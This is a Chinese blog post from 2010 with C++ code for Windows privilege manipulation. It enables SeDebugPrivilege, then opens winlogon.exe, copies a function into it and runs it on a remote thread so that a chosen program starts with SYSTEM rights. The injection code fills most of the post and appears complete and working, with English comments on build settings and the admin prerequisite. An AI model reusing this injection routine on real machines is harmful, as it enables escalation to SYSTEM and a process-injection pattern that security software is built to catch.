作为C++方面的第一篇文章,就先说说获取权限方面的东西吧!首先是获取Debug权限(SeDebugPrivilege,它是做其他进一步工作的基础)。需要注意的是,这一步只能“启用”当前令牌中已经存在的特权:只有管理员令牌才带有 SeDebugPrivilege,普通用户进程不会因此获得任何新权限。想必大家对这个方法应该很熟悉吧,网上有关这个的文章已经很多了,所以我就直接贴代码了!

 

 

代码
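BOOL WINAPI EnterDebug()
{
    // Enable SeDebugPrivilege in the current process token.
    //
    // This only *enables* a privilege the token already holds. A token that
    // does not contain SeDebugPrivilege (any non-administrator token) cannot be
    // upgraded here: AdjustTokenPrivileges still returns TRUE in that case and
    // reports ERROR_NOT_ALL_ASSIGNED via GetLastError(), which is why that is
    // checked explicitly below.  Returns TRUE only when the privilege is
    // actually enabled.
    HANDLE hToken = NULL;       // initialised so the __finally check is valid on every path
    LUID luidDebug;
    TOKEN_PRIVILEGES tkp;
    BOOL fOK = FALSE;

    __try
    {
        // Request only what AdjustTokenPrivileges needs rather than TOKEN_ALL_ACCESS,
        // and check the return value (the original ignored it and tested an
        // uninitialised handle instead).
        if (!OpenProcessToken(GetCurrentProcess(),
                              TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
                              &hToken))
        {
            __leave;
        }

        if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luidDebug))
        {
            __leave;
        }

        tkp.PrivilegeCount = 1;
        tkp.Privileges[0].Luid = luidDebug;
        tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

        if (!AdjustTokenPrivileges(hToken, FALSE, &tkp, 0, NULL, NULL))
        {
            __leave;
        }

        // TRUE from AdjustTokenPrivileges does not mean the privilege was
        // enabled; the token may simply not hold it.
        if (GetLastError() == ERROR_NOT_ALL_ASSIGNED)
        {
            __leave;
        }

        fOK = TRUE;
    }
    __finally
    {
        if (hToken != NULL)
        {
            CloseHandle(hToken);
        }
    }

    return fOK;
}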
41
42  

 

 

好了,以上就是全过程,并且在 Windows XP SP2 + VC2008 下编译通过。如果无法运行,先确认程序是以管理员身份运行的(否则令牌中根本没有 SeDebugPrivilege,EnterDebug 会返回 FALSE);若是被杀毒软件拦截——向 winlogon.exe 注入远线程正是安全软件应当报警的行为——只应在隔离的测试环境中暂时关闭杀毒软件来验证,不要在生产机器上这样做。

 

 

 

 

 

  接下来要着重讲的是如何获取 System 权限。System(LocalSystem)是本机权限最高的账户,几乎拥有全部特权,软件拥有了它可以干很多事!也正因为如此,这类代码是杀毒软件和 EDR 重点监控的对象:正规软件需要以 System 身份运行时应当注册为服务,而不是使用下面这种注入手法。

现在比较流行的获取方式有两种,第一种是通过 HOOK 挂钩相应的 API 函数,在创建进程前修改新进程的父进程,改为从拥有 System 权限的进程(如 winlogon.exe)继承令牌。第二种是通过远线程把创建进程的代码注入到 winlogon.exe 中,这样真正调用 CreateProcess 的是 winlogon.exe,被创建的进程作为它的子进程自然也就继承了 System 权限。

但两种方法都有缺点。第一种:要挂钩的函数在不同版本的操作系统中不同,所以通用性不强。第二种:因为用了远线程,所以容易被杀毒软件消灭。此外,两种方法都要求注入程序与目标进程的位数一致(32 位程序无法向 64 位的 winlogon.exe 注入可执行代码),并且在较新的 Windows 上还可能被额外的进程保护机制拦截。

在这里我先讲第二种方法,第一种我以后再讲。

在做以下工作之前一定要先获得 Debug 权限(调用上面的 EnterDebug),并且程序本身必须以管理员身份运行:打开 winlogon.exe 需要 PROCESS_CREATE_THREAD、PROCESS_VM_OPERATION、PROCESS_VM_WRITE、PROCESS_VM_READ 等访问权限,对系统进程只有在启用 SeDebugPrivilege 之后才能取得。

 

 

代码
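// Parameter block copied verbatim into the target process and handed to the
// injected RemoteFunction as its only argument.  Everything the remote code
// needs has to live inside this struct by value: the copied code cannot
// resolve imports or reference anything in the injector's address space.
// (The original declared this as `static struct`, which is meaningless on a
// type declaration and only produces a compiler warning.)
struct MyData
{
    LPVOID addrCreateProcess;      // kernel32!CreateProcessW, resolved by the injector
    LPVOID addrExitThread;         // kernel32!ExitThread; kept for layout, RemoteFunction does not use it
    WCHAR wsCmdLine[MAX_PATH];     // command line; stored inline (and writable) because CreateProcessW may modify it
    WCHAR stDesktop[16];           // holds L"WinSta0\\Default"; RemoteFunction points si.lpDesktop here
    STARTUPINFO si;                // si.lpDesktop carries an injector-side address until RemoteFunction fixes it up
    LPPROCESS_INFORMATION ppinfo;  // address of a PROCESS_INFORMATION allocated inside the target process
};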
11
// Code copied into the target process; must be self-contained (see RemoteFunction).
static void WINAPI RemoteFunction(MyData *pData);
// Empty marker placed directly after RemoteFunction; its address marks the end of the copied range.
static void WINAPI endFunction();

// Writes RemoteFunction plus a MyData block into hProcess and runs it on a remote thread.
// Takes ownership of hProcess and closes it before returning.
BOOL WINAPI InjectCode(LPWSTR CmdLines,UINT WinShow,HANDLE hProcess);

// Returns an open handle (the caller closes it) to the first process whose image name matches, or 0.
HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess,BOOL bInheritHandle,WCHAR* wcProcessName);
18
19  //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
20  
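static void WINAPI RemoteFunction(MyData *pData)
{
    // Body that is copied byte-for-byte into the target process (the opening
    // brace was missing in the original listing).
    //
    // It executes at a different address, in a process where none of this
    // module's imports, globals, string literals or CRT helpers exist.  So it
    // may only touch its argument and call through the function pointers the
    // injector stored in *pData.  Keep it free of anything the compiler could
    // turn into a call or an absolute reference (no CRT calls, no string
    // literals, no /GS cookie) — see the build notes on endFunction.

    // Real signature of CreateProcessW.  The original typedef declared a LONG
    // return and TCHAR strings; the address the injector resolves is always
    // the W variant, so declare it as such.
    typedef BOOL (WINAPI *CREATEPROCESSW_FN)(
        LPCWSTR lpApplicationName,
        LPWSTR lpCommandLine,
        LPSECURITY_ATTRIBUTES lpProcessAttributes,
        LPSECURITY_ATTRIBUTES lpThreadAttributes,
        BOOL bInheritHandles,
        DWORD dwCreationFlags,
        LPVOID lpEnvironment,
        LPCWSTR lpCurrentDirectory,
        LPSTARTUPINFOW lpStartupInfo,
        LPPROCESS_INFORMATION lpProcessInformation);

    CREATEPROCESSW_FN pfnCreateProcessW = (CREATEPROCESSW_FN)pData->addrCreateProcess;

    // si.lpDesktop was filled in the injector's address space; re-point it at
    // the copy of the desktop string that travelled inside *pData.
    pData->si.lpDesktop = (LPWSTR)pData->stDesktop;

    // bInheritHandles = FALSE (the original passed TRUE): the child needs none
    // of the target's inheritable handles, and passing them down hands objects
    // opened by the high-privilege target to the new process for no reason.
    pfnCreateProcessW(NULL,
                      pData->wsCmdLine,
                      NULL, NULL,
                      FALSE,
                      0,
                      NULL, NULL,
                      (LPSTARTUPINFOW)&pData->si,
                      pData->ppinfo);

    // The outcome is left in *pData->ppinfo (remote memory) for the injector to
    // read back.  Returning ends the remote thread; ExitThread is not required.
}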
35
// Empty marker function.  InjectCode computes the size of RemoteFunction as
// (address of endFunction) - (address of RemoteFunction), so this definition
// must stay immediately after RemoteFunction in the same translation unit and
// the build must not move or thunk functions: link with /INCREMENTAL:NO
// (incremental linking hands out jump-table stubs instead of real addresses),
// and avoid /GL, /Gy COMDAT folding and /GS for this file, since any of them
// can separate the two functions or make RemoteFunction reference data that
// does not exist in the target process.
static void WINAPI endFunction()
{
}
39
40
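BOOL WINAPI InjectCode(LPWSTR CmdLines, UINT WinShow, HANDLE hProcess)
{
    // Copies RemoteFunction and a MyData parameter block into hProcess, runs
    // the copy on a new thread there and waits for it.  The remote copy calls
    // CreateProcessW, so the new process is a child of the target and runs in
    // the target's security context.
    //
    // CmdLines  - command line for the new process; must fit in MAX_PATH-1 chars.
    // WinShow   - SW_* value stored in STARTUPINFO.wShowWindow.
    // hProcess  - target process.  OWNERSHIP IS TAKEN: it is closed on every
    //             return path (the original contract).  It needs
    //             PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE
    //             | PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, plus
    //             PROCESS_DUP_HANDLE for the handle clean-up at the end.
    // Returns TRUE when the remote thread ran to completion and, where the
    // PROCESS_INFORMATION could be read back, CreateProcessW reported success.
    //
    // Assumptions this relies on:
    //  * injector and target have the same bitness — the copied bytes are this
    //    module's native code; a 32-bit injector cannot inject into a 64-bit
    //    winlogon.exe.
    //  * kernel32.dll is mapped at the same base in both processes, so the
    //    addresses resolved locally are valid in the target.
    //  * RemoteFunction and endFunction are contiguous (see endFunction).
    // CreateRemoteThread into winlogon.exe is a textbook injection pattern
    // that AV/EDR products flag; expect it to be blocked on protected hosts.

    BOOL   res        = FALSE;
    HANDLE hThread    = NULL;
    HANDLE hLocal     = NULL;
    HMODULE hKernel32 = NULL;
    SIZE_T cbFunction = 0;
    LPVOID remoteCode = NULL;
    LPVOID remoteData = NULL;
    LPVOID remotePi   = NULL;
    MyData data       = {0};
    PROCESS_INFORMATION pi = {0};

    __try
    {
        if (hProcess == NULL) __leave;

        // wcscpy_s invokes the invalid-parameter handler (process abort) on
        // overflow, so reject over-long input instead of crashing.
        if (CmdLines == NULL || wcslen(CmdLines) >= MAX_PATH) __leave;
        wcscpy_s(data.wsCmdLine, CmdLines);
        wcscpy_s(data.stDesktop, L"WinSta0\\Default");

        data.si.cb          = sizeof(STARTUPINFO);
        data.si.dwFlags     = STARTF_USESHOWWINDOW;   // the original used the bare value 1
        data.si.wShowWindow = (WORD)WinShow;

        hKernel32 = GetModuleHandle(L"kernel32.dll");
        if (hKernel32 == NULL) __leave;
        data.addrCreateProcess = GetProcAddress(hKernel32, "CreateProcessW");
        if (data.addrCreateProcess == NULL) __leave;
        data.addrExitThread = GetProcAddress(hKernel32, "ExitThread");
        if (data.addrExitThread == NULL) __leave;

        // Size of RemoteFunction, measured up to the marker that follows it.
        // Pointer-sized arithmetic: the original (UINT) casts truncate on x64,
        // and a reordered/thunked build would otherwise wrap to a huge size.
        if ((ULONG_PTR)endFunction <= (ULONG_PTR)RemoteFunction) __leave;
        cbFunction = (ULONG_PTR)endFunction - (ULONG_PTR)RemoteFunction;

        // --- copy the code ---
        remoteCode = VirtualAllocEx(hProcess, NULL, cbFunction, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        if (remoteCode == NULL) __leave;
        if (!WriteProcessMemory(hProcess, remoteCode, (LPCVOID)RemoteFunction, cbFunction, NULL)) __leave;

        // --- PROCESS_INFORMATION that the remote CreateProcessW fills in ---
        remotePi = VirtualAllocEx(hProcess, NULL, sizeof(PROCESS_INFORMATION), MEM_COMMIT, PAGE_READWRITE);
        if (remotePi == NULL) __leave;
        data.ppinfo = (LPPROCESS_INFORMATION)remotePi;

        // --- parameter block (si.lpDesktop is fixed up by RemoteFunction) ---
        remoteData = VirtualAllocEx(hProcess, NULL, sizeof(data), MEM_COMMIT, PAGE_READWRITE);
        if (remoteData == NULL) __leave;
        if (!WriteProcessMemory(hProcess, remoteData, &data, sizeof(data), NULL)) __leave;

        // --- run it ---
        hThread = CreateRemoteThread(hProcess, NULL, 0,
                                     (LPTHREAD_START_ROUTINE)remoteCode, remoteData, 0, NULL);
        if (hThread == NULL) __leave;
        if (WaitForSingleObject(hThread, INFINITE) != WAIT_OBJECT_0) __leave;

        res = TRUE;

        // Read the result back.  The two handles CreateProcessW returned live
        // in the TARGET's handle table and would otherwise leak there for the
        // lifetime of winlogon; pull them into this process (closing the remote
        // copies) and release them.  A failed read-back is not treated as an
        // injection failure, so callers that opened hProcess without
        // PROCESS_VM_READ / PROCESS_DUP_HANDLE keep the previous behaviour.
        if (ReadProcessMemory(hProcess, remotePi, &pi, sizeof(pi), NULL))
        {
            if (pi.hProcess == NULL)
            {
                res = FALSE;    // remote CreateProcessW failed
            }
            if (pi.hThread != NULL &&
                DuplicateHandle(hProcess, pi.hThread, GetCurrentProcess(), &hLocal,
                                0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE))
            {
                CloseHandle(hLocal);
                hLocal = NULL;
            }
            if (pi.hProcess != NULL &&
                DuplicateHandle(hProcess, pi.hProcess, GetCurrentProcess(), &hLocal,
                                0, FALSE, DUPLICATE_SAME_ACCESS | DUPLICATE_CLOSE_SOURCE))
            {
                CloseHandle(hLocal);
                hLocal = NULL;
            }
        }
    }
    __finally
    {
        // The remote thread has finished (or never started) on every path that
        // reaches here, so releasing the remote allocations is safe.
        if (remoteCode != NULL) VirtualFreeEx(hProcess, remoteCode, 0, MEM_RELEASE);
        if (remoteData != NULL) VirtualFreeEx(hProcess, remoteData, 0, MEM_RELEASE);
        if (remotePi   != NULL) VirtualFreeEx(hProcess, remotePi,   0, MEM_RELEASE);
        if (hThread    != NULL) CloseHandle(hThread);
        if (hProcess   != NULL) CloseHandle(hProcess);   // ownership taken from the caller
    }

    return res;
}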
124
125
//下面这个函数不是必要的,我只是通过它来获得winlogon.exe的进程句柄。调用时 dwDesiredAccess 至少要包含 PROCESS_QUERY_INFORMATION | PROCESS_VM_READ(取进程映像名所需)以及 InjectCode 需要的访问权限;返回的句柄由调用者(这里是 InjectCode)负责关闭。
127  
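HANDLE WINAPI GetProcessByName(DWORD dwDesiredAccess, BOOL bInheritHandle, WCHAR* wcProcessName)
{
    // Opens the first process whose executable file name (the component after
    // the last path separator) equals wcProcessName, case-insensitively.
    //
    // dwDesiredAccess / bInheritHandle - forwarded to OpenProcess.  The access
    //     must include PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, which
    //     GetModuleFileNameEx requires; processes that cannot be opened with the
    //     requested access are silently skipped.
    // wcProcessName - bare file name such as L"winlogon.exe".
    // Returns an open handle that the CALLER must close, or 0 when nothing matched.
    //
    // Caveats: several instances may exist (e.g. one winlogon.exe per session)
    // and the first one enumerated is returned; the match is on the file name
    // only, not on the full path, so it does not prove the process is the
    // genuine %SystemRoot%\System32 binary; and a 32-bit caller cannot read
    // module names of 64-bit processes with GetModuleFileNameEx (they are skipped).
    if (wcProcessName == NULL || wcProcessName[0] == L'\0')
    {
        return 0;
    }

    DWORD pids[1024] = {0};   // EnumProcesses truncates silently beyond this many processes
    DWORD cbReturned = 0;
    if (!EnumProcesses(pids, sizeof(pids), &cbReturned))
    {
        return 0;
    }

    const DWORD count = cbReturned / sizeof(DWORD);
    for (DWORD i = 0; i < count; i++)
    {
        HANDLE hp = OpenProcess(dwDesiredAccess, bInheritHandle, pids[i]);
        if (hp == NULL)
        {
            continue;
        }

        WCHAR path[MAX_PATH] = {0};
        DWORD cchPath = GetModuleFileNameEx(hp, NULL, path, MAX_PATH);
        if (cchPath == 0)
        {
            CloseHandle(hp);
            continue;
        }

        // Compare only the file-name component.  The original suffix compare
        // indexed out of bounds when the requested name was longer than the
        // path, and let e.g. "xwinlogon.exe" match "winlogon.exe".
        const WCHAR *base = path;
        for (const WCHAR *p = path; *p != L'\0'; p++)
        {
            if (*p == L'\\' || *p == L'/')
            {
                base = p + 1;
            }
        }

        if (_wcsicmp(base, wcProcessName) == 0)
        {
            return hp;      // ownership passes to the caller
        }

        CloseHandle(hp);
    }

    return 0;
}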
165

 

 

 

 

 

 

 

 

 

posted on 2010-10-16 13:12  AniX